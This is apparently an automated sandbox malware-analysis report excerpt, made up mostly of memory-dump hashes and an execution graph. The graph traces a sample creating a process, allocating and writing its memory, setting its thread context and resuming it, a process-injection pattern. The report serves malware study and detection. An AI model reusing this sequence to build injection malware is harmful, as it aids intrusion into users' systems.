                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82a57dcf07a82e8e8dbd4ddcf4679df209331febdd45c4cb6fa8e36cf590c044
                                                • Instruction ID: ec1c792f2feb05178fab6ee67f0e496125e228ceb23fe3dd2d0232e42da5c63e
                                                • Opcode Fuzzy Hash: 82a57dcf07a82e8e8dbd4ddcf4679df209331febdd45c4cb6fa8e36cf590c044
                                                • Instruction Fuzzy Hash: 43A1A574E012198FEB68CF6AD944BADFBF2AF89300F14C1E9D409A7254D7745A85CF11
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6de365c8ed41d620699bc5d065e2c0d2c39054aaa27264723f65a7bbb075882
                                                • Instruction ID: 1649ede81b3ace18183d8f3e851cd6fdd72309808ee1a1746da6453f6cb516a5
                                                • Opcode Fuzzy Hash: e6de365c8ed41d620699bc5d065e2c0d2c39054aaa27264723f65a7bbb075882
                                                • Instruction Fuzzy Hash: 85A1B474E11219CFEB68CF6AD944B9DBBF2BF89304F54C1A9D409A7254DB704A85CF10
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1f225fbbbee70685f02bd59c38c8e2d4f55186dce7a86d61023c14fcc894f1b
                                                • Instruction ID: 1b106655847dd5ddd3d728e6cc183a25f9df2c8f4a2d517150005a2e5761fe14
                                                • Opcode Fuzzy Hash: b1f225fbbbee70685f02bd59c38c8e2d4f55186dce7a86d61023c14fcc894f1b
                                                • Instruction Fuzzy Hash: CBA1B470E112198FEB68CF6AC984BDDFBF2AF88304F54C0AAD409A7254DB745A85CF50
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b2308b70392a40f51ace5182fd1c279c8f2a340fed2efca84445583ca1eba8b
                                                • Instruction ID: 805ae99c859156a02d2d02f55cb27df08972a392820ed35c56791e8125a8d811
                                                • Opcode Fuzzy Hash: 2b2308b70392a40f51ace5182fd1c279c8f2a340fed2efca84445583ca1eba8b
                                                • Instruction Fuzzy Hash: 0AA194B5E012198FEB68CF6AC944BEDFBF2AB89300F14C1E9D409A7254DB745A85CF11
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663397367.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6d0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02c881b96a0b1c4068d8124941c7118aff43ff65f16e46359adacf6465e32dca
                                                • Instruction ID: 8433eab3f3b0b8c33234cd6535c3988ab188d0dfbc32a0afb072deb64c26cf7d
                                                • Opcode Fuzzy Hash: 02c881b96a0b1c4068d8124941c7118aff43ff65f16e46359adacf6465e32dca
                                                • Instruction Fuzzy Hash: 9A81A074E04218CFDB19DFA9C980BADBBB2FF89300F248529D805AB359DB359946CF40
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_21b0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1df7d8ecb5acbbdf92acd42924abf57da09d65017379d2d7215c547f33df8adb
                                                • Instruction ID: 495da24970f9b105c70d5e435d2a00dd30973e8fb189b8400e1167de3a3c6984
                                                • Opcode Fuzzy Hash: 1df7d8ecb5acbbdf92acd42924abf57da09d65017379d2d7215c547f33df8adb
                                                • Instruction Fuzzy Hash: 8D5104B0D01218CFDB19CFAAD8887DDBBB2BF89314F10C52AD814AB294DB759949CF54
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663621415.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_21b0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb94126413438b73e0047229a0b47171b0de117ff0a3793ee282eeed4f21b8e5
                                                • Instruction ID: 2d1aadb56cbd6216c9dae993d78a40d3bd320a5c32dda533e3f65bec5b557538
                                                • Opcode Fuzzy Hash: fb94126413438b73e0047229a0b47171b0de117ff0a3793ee282eeed4f21b8e5
                                                • Instruction Fuzzy Hash: 1C510374D01208CFCB19CFA9D4846DDBBB1BF49315F20952AD825BB294D775988ACF14
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8c65ee9314e9b5c810389eb7f53296128d24a393039dc4796ebd00797d4c32b
                                                • Instruction ID: d47a7a1bbfbd5f378228842f88bf1ae6b407dd5aa171556db603215fb1fba857
                                                • Opcode Fuzzy Hash: e8c65ee9314e9b5c810389eb7f53296128d24a393039dc4796ebd00797d4c32b
                                                • Instruction Fuzzy Hash: 04410274E10248CFCB04DFA9D594BEDBBF2BF49300F509129D409AB294DB745A46CF41
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bca7b702a1f5a91cddfb9ce21dfb6272783bd959c63bee0391a32984dfbd96f9
                                                • Instruction ID: 51f2b998219e1be87a3553d9b52601bfd06a5875c1e1b06aa3295d981c1790f1
                                                • Opcode Fuzzy Hash: bca7b702a1f5a91cddfb9ce21dfb6272783bd959c63bee0391a32984dfbd96f9
                                                • Instruction Fuzzy Hash: 7941D074E10208CFCB04DFA9D594BEDBBF2BF89300F509129D409A7298DB745A46CF51
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663033050.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_1bd000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9146702ffaaeb88d35640a39ad2b9685f0e94721eb19a0c3fb85bdcb4cd7c3c
                                                • Instruction ID: 7a0771835053173259410ddda5b1ac4f9468a503779cbed15a035c92c20885f2
                                                • Opcode Fuzzy Hash: e9146702ffaaeb88d35640a39ad2b9685f0e94721eb19a0c3fb85bdcb4cd7c3c
                                                • Instruction Fuzzy Hash: 042104B1604344EFDB19DF24E8C4B66BB61FB84314F34C5A9F8494B246D73AD846CB61
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 328c6515f0986737bb3dd895e943e04e5f1e0d10b79cfc4ce7a3682e3f31f353
                                                • Instruction ID: 243c804c721f41826b27e933ea8060ce104f3acc382554264b9f8e23d7b1cf99
                                                • Opcode Fuzzy Hash: 328c6515f0986737bb3dd895e943e04e5f1e0d10b79cfc4ce7a3682e3f31f353
                                                • Instruction Fuzzy Hash: A031B778E11308CFCB44DFA4E58499DBBB6FF49300B60946AE809AB364D731AC55CF10
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b52d296efadfbb3c0159ea24a8a91224e2aa65f07ba27655d63e0b571fbcbb4f
                                                • Instruction ID: eedca9edb49fedc5006984b32e5e5aeea0d49274587e7985e37197944a2c739c
                                                • Opcode Fuzzy Hash: b52d296efadfbb3c0159ea24a8a91224e2aa65f07ba27655d63e0b571fbcbb4f
                                                • Instruction Fuzzy Hash: E9117274A102199FDF08DFA8D4C4AADFBB9FB98304F558925D804E7282D731A991CF10
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db9dbd7f1084f631d09429400e8c16ae5cccd78cd72236a1635af90ceb7973d6
                                                • Instruction ID: 2ad92384e6615360d4787b410dd5cf2ea54fbbe65373f46685dcb237c0bdbc80
                                                • Opcode Fuzzy Hash: db9dbd7f1084f631d09429400e8c16ae5cccd78cd72236a1635af90ceb7973d6
                                                • Instruction Fuzzy Hash: B01103B0D14209CFCB01DFA8D8841EEBBB5BF4A300B5581A6D804B7255EB309A55CFA1
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 522bcf7bae8c1f986f580f48312a2e368707b67453b4147e5b4789c257c73b44
                                                • Instruction ID: 1f34ea9daccc3edfaf5e1eb3fda9d4776133399819bad7a06f37c4e9eb8ce2e7
                                                • Opcode Fuzzy Hash: 522bcf7bae8c1f986f580f48312a2e368707b67453b4147e5b4789c257c73b44
                                                • Instruction Fuzzy Hash: 66216DB4900209DFCB45EFA8D58179EBBF5FF85300F50C9AAD0149B269EB309A49CF81
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e51467912721d35d47f8c5a8fc9e82d7e9ec36dec0cd60691ee8f672cc8e903
                                                • Instruction ID: f7e2670fca4fa8ff970fedd02992db9e298ffddfdc2fdf010809ce0a84d39298
                                                • Opcode Fuzzy Hash: 2e51467912721d35d47f8c5a8fc9e82d7e9ec36dec0cd60691ee8f672cc8e903
                                                • Instruction Fuzzy Hash: CF116DB49002099FCB45EFA8D58179EBBF5FF84300F50C9AAD0149B259EB309A498B81
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663033050.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_1bd000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction ID: bbb16061b5219b204c079a3943cd2242c02ccf0e0fc7af38194d9b3a0d5bbb32
                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction Fuzzy Hash: 9611DD75504280CFDB16CF24D9C4B55BFA1FB84314F28CAADE8494B256C33AD84ACFA2
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94ed9d73fa2f3607a9e263a0e530033d32b99647bd6188dc3de733b95f5cba11
                                                • Instruction ID: bc7f5c386cc110020e1a07b9bb88163a7466dbffeb1ba1ffc4ca5a553b70495b
                                                • Opcode Fuzzy Hash: 94ed9d73fa2f3607a9e263a0e530033d32b99647bd6188dc3de733b95f5cba11
                                                • Instruction Fuzzy Hash: 2821CE74C142198FCB04EFA8D9845EEBBF4BF4A300F1492AAD804F3251EB305A95CFA1
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7ef771a301ccf61ec9d4a6bb6c08f7dc9bd5112d98831af7c65c477a02a59c3
                                                • Instruction ID: 92750555c2cbd1660d53bd18bbc3c718144f344a626738f1e52d5b4fad2420b5
                                                • Opcode Fuzzy Hash: e7ef771a301ccf61ec9d4a6bb6c08f7dc9bd5112d98831af7c65c477a02a59c3
                                                • Instruction Fuzzy Hash: 17116D78D042499FCB02DFA4D8909AEBFB1FF4A300F4045A6D800E7365D7345A59CF91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                                                • API String ID: 0-3547488823
                                                • Opcode ID: 0cc9cc49b0a84f069b61d20012980b7e984988a24d80b52cf639c64f398885ae
                                                • Instruction ID: b937e2f03170d9e772a21a449d2604a950a06dd88c9a2a0d2d4103458e0464b5
                                                • Opcode Fuzzy Hash: 0cc9cc49b0a84f069b61d20012980b7e984988a24d80b52cf639c64f398885ae
                                                • Instruction Fuzzy Hash: AD32B274E00218CFDB68CFA5C954B9DBBB2BF89300F5085A9D80AAB355DB719E85DF10
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                                                • API String ID: 0-3547488823
                                                • Opcode ID: f1aa1d1539581a44ea1c79723843591ce55aff64fbdb59c83b6066451a1e078e
                                                • Instruction ID: 881eb6cf0d1c174c07015fbe54ae97b572b503fd29cd16b7e56f0a65958776ef
                                                • Opcode Fuzzy Hash: f1aa1d1539581a44ea1c79723843591ce55aff64fbdb59c83b6066451a1e078e
                                                • Instruction Fuzzy Hash: 5602B0B4E00218CFDB58DFA5C954B9DBBB2BF89300F1085A9D809AB365DB719E85CF50

                                                Execution Graph

                                                Execution Coverage:17.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:89
                                                Total number of Limit Nodes:2
                                                execution_graph 8487 25eeb9 8488 25ede4 8487->8488 8489 25ee9e 8488->8489 8491 591010 8488->8491 8492 59102a 8491->8492 8498 59104e 8492->8498 8506 5914b5 8492->8506 8510 5917b3 8492->8510 8514 591a53 8492->8514 8518 591a3b 8492->8518 8526 591547 8492->8526 8531 591687 8492->8531 8535 591d6e 8492->8535 8541 591768 8492->8541 8546 591876 8492->8546 8550 591517 8492->8550 8555 591414 8492->8555 8560 5919b5 8492->8560 8498->8489 8507 5914e2 8506->8507 8565 25e8ac 8506->8565 8569 25e8b8 8506->8569 8507->8498 8573 25e520 8510->8573 8577 25e519 8510->8577 8511 5917d7 8511->8498 8581 25e680 8514->8581 8585 25e678 8514->8585 8515 591a75 8515->8498 8519 591cb2 8518->8519 8597 25e2c1 8519->8597 8601 25e2c8 8519->8601 8520 59150d 8521 591794 8520->8521 8589 25dda0 8520->8589 8593 25dd98 8520->8593 8521->8498 8527 591548 8526->8527 8529 25dda0 ResumeThread 8527->8529 8530 25dd98 ResumeThread 8527->8530 8528 591794 8528->8498 8529->8528 8530->8528 8605 25e3f1 8531->8605 8609 25e3f8 8531->8609 8532 5916bd 8532->8498 8536 591d7b 8535->8536 8537 591835 8535->8537 8539 25e520 WriteProcessMemory 8537->8539 8540 25e519 WriteProcessMemory 8537->8540 8538 59180d 8538->8498 8539->8538 8540->8538 8542 59176e 8541->8542 8544 25dda0 ResumeThread 8542->8544 8545 25dd98 ResumeThread 8542->8545 8543 591794 8543->8498 8544->8543 8545->8543 8548 25e520 WriteProcessMemory 8546->8548 8549 25e519 WriteProcessMemory 8546->8549 8547 5918a4 8548->8547 8549->8547 8551 591518 8550->8551 8552 591794 8551->8552 8553 25dda0 ResumeThread 8551->8553 8554 25dd98 ResumeThread 8551->8554 8552->8498 8553->8552 8554->8552 8556 59141e 8555->8556 8558 25e8ac CreateProcessA 8556->8558 8559 25e8b8 CreateProcessA 8556->8559 8557 5914e2 8557->8498 8558->8557 8559->8557 8561 59177f 8560->8561 8562 591794 8561->8562 8563 25dda0 ResumeThread 8561->8563 8564 25dd98 ResumeThread 8561->8564 8562->8498 8563->8562 8564->8562 8566 25e8b2 CreateProcessA 8565->8566 8568 25eb9d 
8566->8568 8568->8568 8570 25e93f CreateProcessA 8569->8570 8572 25eb9d 8570->8572 8572->8572 8574 25e56c WriteProcessMemory 8573->8574 8576 25e60b 8574->8576 8576->8511 8578 25e56c WriteProcessMemory 8577->8578 8580 25e60b 8578->8580 8580->8511 8582 25e6cc ReadProcessMemory 8581->8582 8584 25e74a 8582->8584 8584->8515 8586 25e6cc ReadProcessMemory 8585->8586 8588 25e74a 8586->8588 8588->8515 8590 25dde4 ResumeThread 8589->8590 8592 25de36 8590->8592 8592->8521 8594 25dde4 ResumeThread 8593->8594 8596 25de36 8594->8596 8596->8521 8598 25e2c8 Wow64SetThreadContext 8597->8598 8600 25e38f 8598->8600 8600->8520 8602 25e311 Wow64SetThreadContext 8601->8602 8604 25e38f 8602->8604 8604->8520 8606 25e3f8 VirtualAllocEx 8605->8606 8608 25e4ba 8606->8608 8608->8532 8610 25e43c VirtualAllocEx 8609->8610 8612 25e4ba 8610->8612 8612->8532
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd

                                                Control-flow Graph

                                                control_flow_graph 337 25e8ac-25e8b0 338 25e8c5-25e951 337->338 339 25e8b2-25e8c4 337->339 341 25e953-25e96a 338->341 342 25e99a-25e9c2 338->342 339->338 341->342 347 25e96c-25e971 341->347 345 25e9c4-25e9d8 342->345 346 25ea08-25ea5e 342->346 345->346 354 25e9da-25e9df 345->354 356 25eaa4-25eb9b CreateProcessA 346->356 357 25ea60-25ea74 346->357 348 25e994-25e997 347->348 349 25e973-25e97d 347->349 348->342 351 25e981-25e990 349->351 352 25e97f 349->352 351->351 355 25e992 351->355 352->351 358 25e9e1-25e9eb 354->358 359 25ea02-25ea05 354->359 355->348 375 25eba4-25ec89 356->375 376 25eb9d-25eba3 356->376 357->356 365 25ea76-25ea7b 357->365 360 25e9ed 358->360 361 25e9ef-25e9fe 358->361 359->346 360->361 361->361 364 25ea00 361->364 364->359 366 25ea7d-25ea87 365->366 367 25ea9e-25eaa1 365->367 369 25ea89 366->369 370 25ea8b-25ea9a 366->370 367->356 369->370 370->370 371 25ea9c 370->371 371->367 388 25ec99-25ec9d 375->388 389 25ec8b-25ec8f 375->389 376->375 391 25ecad-25ecb1 388->391 392 25ec9f-25eca3 388->392 389->388 390 25ec91 389->390 390->388 394 25ecc1-25ecc5 391->394 395 25ecb3-25ecb7 391->395 392->391 393 25eca5 392->393 393->391 397 25ecc7-25ecf0 394->397 398 25ecfb-25ed06 394->398 395->394 396 25ecb9 395->396 396->394 397->398 402 25ed07 398->402 402->402
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025EB7F
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0

                                                Control-flow Graph

                                                control_flow_graph 403 25e8b8-25e951 405 25e953-25e96a 403->405 406 25e99a-25e9c2 403->406 405->406 411 25e96c-25e971 405->411 409 25e9c4-25e9d8 406->409 410 25ea08-25ea5e 406->410 409->410 418 25e9da-25e9df 409->418 420 25eaa4-25eb9b CreateProcessA 410->420 421 25ea60-25ea74 410->421 412 25e994-25e997 411->412 413 25e973-25e97d 411->413 412->406 415 25e981-25e990 413->415 416 25e97f 413->416 415->415 419 25e992 415->419 416->415 422 25e9e1-25e9eb 418->422 423 25ea02-25ea05 418->423 419->412 439 25eba4-25ec89 420->439 440 25eb9d-25eba3 420->440 421->420 429 25ea76-25ea7b 421->429 424 25e9ed 422->424 425 25e9ef-25e9fe 422->425 423->410 424->425 425->425 428 25ea00 425->428 428->423 430 25ea7d-25ea87 429->430 431 25ea9e-25eaa1 429->431 433 25ea89 430->433 434 25ea8b-25ea9a 430->434 431->420 433->434 434->434 435 25ea9c 434->435 435->431 452 25ec99-25ec9d 439->452 453 25ec8b-25ec8f 439->453 440->439 455 25ecad-25ecb1 452->455 456 25ec9f-25eca3 452->456 453->452 454 25ec91 453->454 454->452 458 25ecc1-25ecc5 455->458 459 25ecb3-25ecb7 455->459 456->455 457 25eca5 456->457 457->455 461 25ecc7-25ecf0 458->461 462 25ecfb-25ed06 458->462 459->458 460 25ecb9 459->460 460->458 461->462 466 25ed07 462->466 466->466
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025EB7F
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0

                                                Control-flow Graph

                                                control_flow_graph 467 25e519-25e58b 469 25e5a2-25e609 WriteProcessMemory 467->469 470 25e58d-25e59f 467->470 472 25e612-25e664 469->472 473 25e60b-25e611 469->473 470->469 473->472
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E5F3
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 478 25e520-25e58b 480 25e5a2-25e609 WriteProcessMemory 478->480 481 25e58d-25e59f 478->481 483 25e612-25e664 480->483 484 25e60b-25e611 480->484 481->480 484->483
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E5F3
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 489 25e678-25e748 ReadProcessMemory 492 25e751-25e7a3 489->492 493 25e74a-25e750 489->493 493->492
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E732
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 498 25e680-25e748 ReadProcessMemory 501 25e751-25e7a3 498->501 502 25e74a-25e750 498->502 502->501
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E732
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 507 25e3f1-25e4b8 VirtualAllocEx 511 25e4c1-25e50b 507->511 512 25e4ba-25e4c0 507->512 512->511
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025E4A2
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 517 25e3f8-25e4b8 VirtualAllocEx 520 25e4c1-25e50b 517->520 521 25e4ba-25e4c0 517->521 521->520
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025E4A2
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 526 25e2c1-25e328 529 25e33f-25e38d Wow64SetThreadContext 526->529 530 25e32a-25e33c 526->530 532 25e396-25e3e2 529->532 533 25e38f-25e395 529->533 530->529 533->532
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025E377
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 538 25e2c8-25e328 540 25e33f-25e38d Wow64SetThreadContext 538->540 541 25e32a-25e33c 538->541 543 25e396-25e3e2 540->543 544 25e38f-25e395 540->544 541->540 544->543
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025E377
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
